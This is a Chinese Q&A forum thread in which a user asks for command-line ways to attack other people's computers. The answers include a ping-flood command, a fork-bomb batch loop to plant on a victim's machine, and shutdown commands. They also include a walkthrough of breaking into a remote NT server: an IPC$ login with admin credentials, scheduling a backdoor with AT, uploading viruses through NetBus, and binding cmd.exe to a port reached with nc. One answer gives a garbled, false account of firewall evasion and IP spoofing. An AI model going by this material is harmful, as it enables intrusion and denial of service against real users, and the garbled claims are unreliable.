cmd攻击别人电脑命令, 20
还要使用,希望有高手回答,我只是小鸟。
不想每天给别人攻击,我也想反攻,我1天最高给人攻击3505次,
弄嘚我电脑老是死机
希望有人帮帮我,只要cmd 攻击命令
不要讲1大窜,
无聊得东西 展开
把你邮箱发给我,给你一个我用Python做的攻击器,只要知道对方IP,分分钟对方死机
(原理:运用缓冲区溢出和网络堵塞以及网络欺骗原理,因为中国的防火墙对PING非常敏感,只要你使用此命令,并且重复向对方发送数据包,将会被中国网络安全联合部发现,根据中华人民共和国网络协议,将会犯罪。当然,我们精深的黑客当然会有一些办法躲避防火墙监视,先用PING进行网络堵塞攻击,我说了,中国防火墙对PING非常敏感,所以将会来监视,在这时,我们就用到了一个程序员都知道的原理:计算机只会听人指挥,不会有思维,你要他干什么,他就会干什么,你不让他停止,他就永远不会停止。所以,防火墙就会一直监视PING命令。这是,我们就运用缓冲区溢出原理,向对方不断发送PING,当然,既然防火墙都去监视之前的PING了,这个PING自然就会看轻。所以可以将数据包设置为1000-65500。这时候,网络欺骗将会生效,我用Python代码进行欺骗,欺骗对方IP,说“我”不是攻击者,xxx.xxx.xxx.xxx(任意IP)才是攻击者!这样,就会欺骗对方计算机。于是,就进行了很好的掩饰。就可以通过python程序的PING指令进行攻击了。对方严重的话20分钟卡死,重启其实就可以了,可能你会问我,为什么不让对方完蛋。例如黑客常用的“wnuke”“冰河”等,都会对对方进行严重的损失,违反了中华人民共和国网络协议,所以,让对方死机已经很可以了。如果你想要让局域网内的计算机断网的C++或Java代码,我可以给你用,但是,请不要违法!)
攻击器样式如下(大概):
然后还得再学点编程语言,至少C与UNIX下的SHELL编程得会一点,能看懂人家写的利用各种漏洞的程序,能对它进行修改,偶尔还能写几个小程序放到网上让大伙儿乐乐,这样玩起来才可能有成就感(其实我自己还不太行,但这多少是个目标)
好了,废话少说,先讲讲一些MS系统里自带的相关网络程序的使用吧。
在MS的操作系统中,与网络安全较有关系的几个命令/程序是:ping\winipcfg\tracert\net\at\netstat,且待我慢慢道来:
1. ping:这是TCP/IP协议中最有用的命令之一
它给另一个系统发送一系列的数据包,该系统本身又发回一个响应,这条实用程序对查找远程主机很有用,它返回的结果表示是否能到达主机,宿主机发送一个返回数据包需要多长时间。
Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]
[-r count] [-s count] [[-j host-list] | [-k host-list]]
[-w timeout] destination-list
Options:
-t Ping the specifed host until interrupted.(除非人为中止,否则一直ping下去)
-a Resolve addresses to hostnames.(把IP转为主机名)
-n count Number of echo requests to send.(响应请求的数量)
-l size Send buffer size.(封包的大小)
-f Set Don't Fragment flag in packet.(信息包中无碎片)
-i TTL Time To Live.(时间)
-v TOS Type Of Service.(服务类型)
-r count Record route for count hops.
-s count Timestamp for count hops.
-j host-list Loose source route along host-list.
-k host-list Strict source route along host-list.(较严格的……唉,怎么译好……算了,放着吧)
-w timeout Timeout in milliseconds to wait for each reply.(timeout的时间)
比如大家可能都知道的一个命令 # ping -f -s 65000 ***.***.***.***或者前阶段大家所谓ping死霉国佬时所用的命令(当然这样只会造成我方自己的网络阻塞)。
其实这个命令主要是用来看对方应答的速度,如果怎么ping 得到的结果都是request time out。那恐怕你根本就不用你去找这台主机了,它不在你的射程之内。
2. winipcfg:
这是用来看自己IP位址的小工具,win98自带,NT里则网络监视器里就能看到IP了,还有个小实用程序叫……好象是叫IPCONFIG吧,没怎么用,都快忘了……这种东东网上其实相当之多,但既然“自带”,又何须外求,何况网上下载的黑客的东东里有没有特洛伊犹未可知,再说了,如果你不是在自己的“爱姬”上运行,岂不是就没法干活?——哈,不好意思,跑题了,但——接着跑两句:可以把一些常用的、经典的工具上传到网上,当作一个备份,什么时候在网吧、某家公司要干活的话,直接下载就是一个完整无缺的工具包了。
这个东东相当简单,直接在DOS下键入命令就是了,没有什么参数。
3. tracert:是验证通往远程主机路径的实用程序
用法: tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name
参数:
-d Do not resolve addresses to hostnames.(不将IP转为主机名)
-h maximum_hops Maximum number of hops to search for target.(最大跟踪数量)
-j host-list Loose source route along host-list.
-w timeout Wait timeout milliseconds for each reply.(time out 的时间)
最简单的用法就是 tracert hostname 其中hostname是计算机名或你想跟踪其路径的计算机的IP地址。TRACERT将返回数据包借以到达最终目的地的各种IP地址,你知道该怎么利用它吗?
我略为解释一下吧:跟踪通往210.142.192.130的路由,最大30:
第一行:*&^%&* 我就是从这里出去的(呵,真不想说^&^)
第四行:是不是快要出国了呢?
第九行:呀!这是日本鬼子的地盘……
4. net:这可是个非常棒的东西,如果不会用的话,赶紧睁大眼睛噢
这个命令的语法是: 可用的命令包括:
NET ACCOUNTS NET HELP NET SHARE
NET COMPUTER NET HELPMSG NET START
NET CONFIG NET LOCALGROUP NET STATISTICS
NET CONFIG SERVER NET NAME NET STOP
NET CONFIG WORKSTATION NET PAUSE NET TIME
NET CONTINUE NET PRINT NET USE
NET FILE NET SEND NET USER
NET GROUP NET SESSION NET VIEW
NET HELP SERVICES 列出用户可以启动的网络服务。
NET HELP SYNTAX 解释如何阅读 NET HELP 语法行。
NET HELP command | MORE 用于逐屏显示帮助。
我可就不逐样解释了——这样会把我的手指累坏,就说说常用的两个命令吧
a.net view
这个命令的语法是:
NET VIEW [\\computername | /DOMAIN[:domainname]]
NET VIEW /NETWORK:NW [\\computername]
NET VIEW 用于显示一个计算机上共享资源的列表。当不带选项使用本命令时,它就会显示当前域或网络上的计算机上的列表。
\\computername 指用户希望浏览其共享资源的计算机。
/DOMAIN:domainname 指定用户希望浏览有效的计算机所在的域。如果省略了域名,就会显示局域网络上的所有域。
/NETWORK:NW 显示 NetWare 网络上所有可用的服务器。如果指定了一个计算机名,就会显示NetWare 网络中那个计算机上的可用资源。
至于举例嘛,比如你知道一个远程计算机***.***.**.***上有开资源共享,那么运行net view \\***.***.**.*** 就可以了
b.net use
这个命令的语法是:NET USE [devicename | *] [\\computername\sharename[\volume] [password | *]]
[/USER:[domainname\]username]
[[/DELETE] | [/PERSISTENT:{YES | NO}]]
NET USE [devicename | *] [password | *]] [/HOME]
NET USE [/PERSISTENT:{YES | NO}]
NET USE 用于将计算机与共享的资源相连接,或者切断计算机与共享资源的连接。当不带选项使用本命令时,它会列出计算机的连接。
devicename 指定一个名字以便与资源相连接,或者指定要切断的设备。有两种类型的设备名:磁盘驱动器 (D: 至 Z:) 和打印机 (LPT1: 至 LPT3:)。输入一个星号来代替一个指定的设备名可以分配下一个可用设备名。
\\computername 指控制共享资源的计算机的名字。如果计算机名中包含有空字符,就要将双反斜线 (\\) 和计算机名一起用引号 (" ")括起来。计算机名可以有1 到15 个字符。
\sharename 指共享资源的网络名字。
\volume 指定一个服务器上的 NetWare 卷。用户必须安装 Netware 的客户服务(Windows NT 工作站) 或者 Netware 的网关服务 (Windows NT 服务器) 并使之与NetWare 服务器相连。
password 指访问共享资源所需要的密码。
* 进行密码提示。当在密码提示符下输入密码时,密码是不会显示的。
/USER 指定连接时的一个不同的用户名。
domainname 指定另外一个域。如果缺省域,就会使用当前登录的域。
username 指定登录的用户名。
/HOME 将用户与他们的宿主目录相连。
/DELETE 取消一个网络连接,并且从永久连接列表中删除该连接。
/PERSISTENT 控制对永久网络连接的使用。其缺省值是最近使用的设置。
YES 在连接产生时保存它们,并在下次登录时恢复它们。
NO 不保存正在产生的连接或后续的连接;现有的连接将在下次登录时被恢复。可以使用 /DELETE 选项开关来删除永久连接。
PS:前两天在绿色兵团的贴子里见到一位仁兄的话,与这个命令有异曲共工之妙,也说明一个大概:
在浏览器中输入 file:///\\***.***.**.***\c
则网上共享的C盘内容就会显示出来了,就仿佛用浏览器上FTP站点看到的一样。各位不妨试试,还可试试举一反三……
5.at: 排定在特定的日期和时间运行某些命令和程序。
运行 AT 命令之前必须先启动 Schedule 服务。瞧,现炒就得现卖,刚学了net命令,但这个start命令我可没详述,自已看看帮助文件,摸索一下各种命令的用法吧。
C:\>net start schedule
Schedule 正在启动服务.....
Schedulw 服务启动成功。
AT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]
AT [\\computername] time [/INTERACTIVE]
[ /EVERY:date[,...] | /NEXT:date[,...]] "command"
\\computername 指定远程计算机。如果省略这个参数命令会被排定在本机上运行。
id 指定给排定进度命令的识别号。
/delete 删除某个已排定进度的命令。如果省略标识,计算机上所有已排定进度的命令都会被删除。
/yes 用于删除所有作业,且不想在运行删除时显示确认信息 。
time 指定命令运行的时间。
interactive 允许作业在运行时,与用户通过桌面交互。
/every:date[,...] 指定在每周或每月的某日 (或某几日) 运行命令。
如果省略日期,则默认为在每月的本日运行。
/next:date[,...] 指定在下一个指定日期 (如,下周三),运行命令。
如果省略日期,则默认为在每月的本日运行。
"command" 准备运行的 Windows NT 命令或批处理文件。
知道了如何使用AT,再来看看如何在远程NT上运行ntsrv.exe:
1 利用管理员登陆到目的服务器,方法为: net use \\x.x.x.x\ipc$ "adminpwd" /user:"adminuser"
2 利用ntsrv.exe启动远程: netsvc \\x.x.x.x schedule /start
3 利用AT.EXE在远程服务器设置程序定时运行,当然最快运行最理想,所以,你可以用letmein.exe得到服务器的时间,然后:
at \\x.x.x.x 00:00 ntsrv.exe /port:64321
其中00:00要改为用letmein.exe得回来的具体时间+一点容量,等一会后,再在本地启动netbus.exe,键入目的服务器得ip地址或hostname,连接!比如第一种方法,你想要在目的服务器运行诸如病毒之类的东东,可以利用netbus得上传功能,将各种“大补丸”上传至目的服务器,再用netbus的"Start program",键入完整路径,就ok了!第二种方法是利用netbus的“App redirect”功能,启动远程telnet服务,如下:在netbus中击“App redirect”,键入"C:\>winnt\system32\cmd.exe",Port为:4321,服务就启动了,然后在本地运行:nc x.x.x.x 4321,出现dos启动的画面就表示连接成功:
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.
C:\>
注:这里有一小段是抄KILLUSA的文章——别找我要稿费啊^&^
4.netstat 这是一个观察网络连接状态的实用工具。
它能检验IP的当前连接状态,在断定你的基本级通信正在进行后,就要验证系统上的服务。这个服务包括检查正在收听输入的通信量和/或验证你正在创建一个与远程站点的会话,它可以很轻松地做到这一点。网上也可以看到很多如X-netstat之类的工具,是WIN界面的,更加直观而已,并没有多什么功能,这个命令的具体用法如下:
Displays protocol statistics and current TCP/IP network connections.(显示协议与当前网络连接)
NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]
-a Displays all connections and listening ports.(显示所有连接和监听端口)
-e Displays Ethernet statistics. This may be combined with the -s
option.(显示以太连接,可以与-s连用)
-n Displays addresses and port numbers in numerical form.(显示地址和端口)
-p proto Shows connections for the protocol specified by proto; proto
may be TCP or UDP. If used with the -s option to display
per-protocol statistics, proto may be TCP, UDP, or IP.
-r Displays the routing table.
-s Displays per-protocol statistics. By default, statistics are
shown for TCP, UDP and IP; the -p option may be used to specify
a subset of the default.
interval Redisplays selected statistics, pausing interval seconds
between each display. Press CTRL+C to stop redisplaying
statistics. If omitted, netstat will print the current
configuration information once.(interval是设定一个刷新时间,在间隔时间内暂停,按CTRL+C停止……)
这是我在本机未连接网络时运行的,第一列为协议,第二列为本地地址,第三列是与你进行连接的主机或用户的IP位址(IP后冒号之后的数字是端口号),最后一列是状态。这个命令以-n和-a的参数我较常使用,读者可以参考使用。
对于Windows下ping命令相信大家已经再熟悉不过了,但是能把ping的功能发挥到最大的人却并不是很多,当然我也并不是说我可以让ping发挥最大的功能,我也只不过经常用ping这个工具,也总结了一些小经验,现在和大家分享一下。
现在我就参照ping命令的帮助说明来给大家说说我使用ping时会用到的技巧,ping只有在安装了TCP/IP协议以后才可以使用:
ping [-t] [-a] [-n count] [-l length] [-f] [-i ttl] [-v tos] [-r count] [-s count] [[-j computer-list] | [-k computer-list]] [-wz timeout] destination-list
Options:
-t Ping the specified host until stopped.To see statistics and continue - type Control-Break;To stop - type Control-C.
不停的ping地方主机,直到你按下Control-C。
此功能没有什么特别的技巧,不过可以配合其他参数使用,将在下面提到。
-a Resolve addresses to hostnames.
解析计算机NetBios名。
示例:C:\>ping -a 192.168.1.21
Pinging iceblood.yofor.com [192.168.1.21] with 32 bytes of data:
Reply from 192.168.1.21: bytes=32 time<10ms TTL=254
Reply from 192.168.1.21: bytes=32 time<10ms TTL=254
Reply from 192.168.1.21: bytes=32 time<10ms TTL=254
Reply from 192.168.1.21: bytes=32 time<10ms TTL=254
Ping statistics for 192.168.1.21:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
从上面就可以知道IP为192.168.1.21的计算机NetBios名为iceblood.yofor.com。
-n count Number of echo requests to send.
发送count指定的Echo数据包数。
在默认情况下,一般都只发送四个数据包,通过这个命令可以自己定义发送的个数,对衡量网络速度很有帮助,比如我想测试发送50个数据包的返回的平均时间为多少,最快时间为多少,最慢时间为多少就可以通过以下获知:
C:\>ping -n 50 202.103.96.68
Pinging 202.103.96.68 with 32 bytes of data:
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Request timed out.
………………
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Ping statistics for 202.103.96.68:
Packets: Sent = 50, Received = 48, Lost = 2 (4% loss),Approximate round trip times in milli-seconds:
Minimum = 40ms, Maximum = 51ms, Average = 46ms
从以上我就可以知道在给202.103.96.68发送50个数据包的过程当中,返回了48个,其中有两个由于未知原因丢失,这48个数据包当中返回速度最快为40ms,最慢为51ms,平均速度为46ms。
-l size Send buffer size.
定义echo数据包大小。
在默认的情况下windows的ping发送的数据包大小为32byt,我们也可以自己定义它的大小,但有一个大小的限制,就是最大只能发送65500byt,也许有人会问为什么要限制到65500byt,因为Windows系列的系统都有一个安全漏洞(也许还包括其他系统)就是当向对方一次发送的数据包大于或等于65532时,对方就很有可能挡机,所以微软公司为了解决这一安全漏洞于是限制了ping的数据包大小。虽然微软公司已经做了此限制,但这个参数配合其他参数以后危害依然非常强大,比如我们就可以通过配合-t参数来实现一个带有攻击性的命令:(以下介绍带有危险性,仅用于试验,请勿轻易施于别人机器上,否则后果自负)
C:\>ping -l 65500 -t 192.168.1.21
Pinging 192.168.1.21 with 65500 bytes of data:
Reply from 192.168.1.21: bytes=65500 time<10ms TTL=254
Reply from 192.168.1.21: bytes=65500 time<10ms TTL=254
………………
这样它就会不停的向192.168.1.21计算机发送大小为65500byt的数据包,如果你只有一台计算机也许没有什么效果,但如果有很多计算机那么就可以使对方完全瘫痪,我曾经就做过这样的试验,当我同时使用10台以上计算机ping一台Win2000Pro系统的计算机时,不到5分钟对方的网络就已经完全瘫痪,网络严重堵塞,HTTP和FTP服务完全停止,由此可见威力非同小可。
-f Set Don't Fragment flag in packet.
在数据包中发送“不要分段”标志。
在一般你所发送的数据包都会通过路由分段再发送给对方,加上此参数以后路由就不会再分段处理。
-i TTL Time To Live.
指定TTL值在对方的系统里停留的时间。
此参数同样是帮助你检查网络运转情况的。
-v TOS Type Of Service.
将“服务类型”字段设置为 tos 指定的值。
-r count Record route for count hops.
在“记录路由”字段中记录传出和返回数据包的路由。
在一般情况下你发送的数据包是通过一个个路由才到达对方的,但到底是经过了哪些路由呢?通过此参数就可以设定你想探测经过的路由的个数,不过限制在了9个,也就是说你只能跟踪到9个路由,如果想探测更多,可以通过其他命令实现,我将在以后的文章中给大家讲解。以下为示例:
C:\>ping -n 1 -r 9 202.96.105.101 (发送一个数据包,最多记录9个路由)
Pinging 202.96.105.101 with 32 bytes of data:
Reply from 202.96.105.101: bytes=32 time=10ms TTL=249
Route: 202.107.208.187 ->
202.107.210.214 ->
61.153.112.70 ->
61.153.112.89 ->
202.96.105.149 ->
202.96.105.97 ->
202.96.105.101 ->
202.96.105.150 ->
61.153.112.90
Ping statistics for 202.96.105.101:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 10ms, Maximum = 10ms, Average = 10ms
从上面我就可以知道从我的计算机到202.96.105.101一共通过了202.107.208.187 ,202.107.210.214 , 61.153.112.70 , 61.153.112.89 , 202.96.105.149 , 202.96.105.97这几个路由。
-s count Timestamp for count hops.
指定 count 指定的跃点数的时间戳。
此参数和-r差不多,只是这个参数不记录数据包返回所经过的路由,最多也只记录4个。
-j host-list Loose source route along host-list.
利用 computer-list 指定的计算机列表路由数据包。连续计算机可以被中间网关分隔(路由稀疏源)IP 允许的最大数量为 9。
-k host-list Strict source route along host-list.
利用 computer-list 指定的计算机列表路由数据包。连续计算机不能被中间网关分隔(路由严格源)IP 允许的最大数量为 9。
-w timeout Timeout in milliseconds to wait for each reply.
指定超时间隔,单位为毫秒。
此参数没有什么其他技巧。
ping命令的其他技巧:在一般情况下还可以通过ping对方让对方返回给你的TTL值大小,粗略的判断目标主机的系统类型是Windows系列还是UNIX/Linux系列,一般情况下Windows系列的系统返回的TTL值在100-130之间,而UNIX/Linux系列的系统返回的TTL值在240-255之间,当然TTL的值在对方的主机里是可以修改的,Windows系列的系统可以通过修改注册表以下键值实现:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]
"DefaultTTL"=dword:000000ff
255---FF
128---80
64----40
32----20
好了,ping命令也基本上完全讲解完了
:start
start cmd
goto start
后缀名改为bat
远程连接127.0.0.1 (任意ip)
将文件放在他的电脑里
或输入shutdown -s -r
我只是个孩子 只懂这点
shutdown -s -t 60 表示一分钟后关机
taskkill -f -im cmd.exe表示关闭cmd